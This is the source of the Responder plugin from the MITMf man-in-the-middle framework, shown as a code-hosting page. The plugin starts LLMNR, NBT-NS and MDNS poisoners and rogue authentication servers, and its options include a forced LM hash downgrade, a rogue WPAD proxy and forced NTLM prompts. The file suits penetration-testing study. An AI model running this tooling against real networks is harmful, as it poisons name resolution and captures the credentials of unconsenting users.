byt3bl33d3r/MITMf

View on GitHub
plugins/responder.py

Summary

Maintainability
D
1 day
Test Coverage
#!/usr/bin/env python2.7

# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

from plugins.plugin import Plugin
from twisted.internet import reactor

class Responder(Plugin):
    name        = "Responder"
    optname     = "responder"
    desc        = "Poison LLMNR, NBT-NS and MDNS requests"
    tree_info   = ["NBT-NS, LLMNR & MDNS Responder v2.1.2 by Laurent Gaffie online"]
    version     = "0.2"

    def initialize(self, options):
        '''Called if plugin is enabled, passed the options namespace'''
        self.options   = options
        self.interface = options.interface
        self.ip        = options.ip

        # Load (M)DNS, NBNS and LLMNR Poisoners
        import core.poisoners.LLMNR as LLMNR
        import core.poisoners.MDNS as MDNS
        import core.poisoners.NBTNS as NBTNS
        LLMNR.start()
        MDNS.start()
        NBTNS.start()

        # Load Browser Listener
        import core.servers.Browser as Browser
        Browser.start()

        if self.config["Responder"]["SQL"].lower() == "on":
            from core.servers.MSSQL import MSSQL
            self.tree_info.append("MSSQL server [ON]")
            MSSQL().start()

        if self.config["Responder"]["Kerberos"].lower() == "on":
            from core.servers.Kerberos import Kerberos
            self.tree_info.append("Kerberos server [ON]")
            Kerberos().start()

        if self.config["Responder"]["FTP"].lower() == "on":
            from core.servers.FTP import FTP
            self.tree_info.append("FTP server [ON]")
            FTP().start()

        if self.config["Responder"]["POP"].lower() == "on":
            from core.servers.POP3 import POP3
            self.tree_info.append("POP3 server [ON]")
            POP3().start()

        if self.config["Responder"]["SMTP"].lower() == "on":
            from core.servers.SMTP import SMTP
            self.tree_info.append("SMTP server [ON]")
            SMTP().start()

        if self.config["Responder"]["IMAP"].lower() == "on":
            from core.servers.IMAP import IMAP
            self.tree_info.append("IMAP server [ON]")
            IMAP().start()

        if self.config["Responder"]["LDAP"].lower() == "on":
            from core.servers.LDAP import LDAP
            self.tree_info.append("LDAP server [ON]")
            LDAP().start()

    def reactor(self, strippingFactory):
        reactor.listenTCP(3141, strippingFactory)

    def options(self, options):
        options.add_argument('--analyze',       dest="analyze",action="store_true", help="Allows you to see NBT-NS, BROWSER, LLMNR requests without poisoning")
        options.add_argument('--wredir',        dest="wredir", action="store_true", help="Enables answers for netbios wredir suffix queries")
        options.add_argument('--nbtns',         dest="nbtns",  action="store_true", help="Enables answers for netbios domain suffix queries")
        options.add_argument('--fingerprint',   dest="finger", action="store_true", help="Fingerprint hosts that issued an NBT-NS or LLMNR query")
        options.add_argument('--lm',            dest="lm",     action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier")
        options.add_argument('--wpad',          dest="wpad",   action="store_true", help="Start the WPAD rogue proxy server")
        options.add_argument('--forcewpadauth', dest="forcewpadauth", action="store_true", help="Force NTLM/Basic authentication on wpad.dat file retrieval (might cause a login prompt)")
        options.add_argument('--basic',         dest="basic",         action="store_true", help="Return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")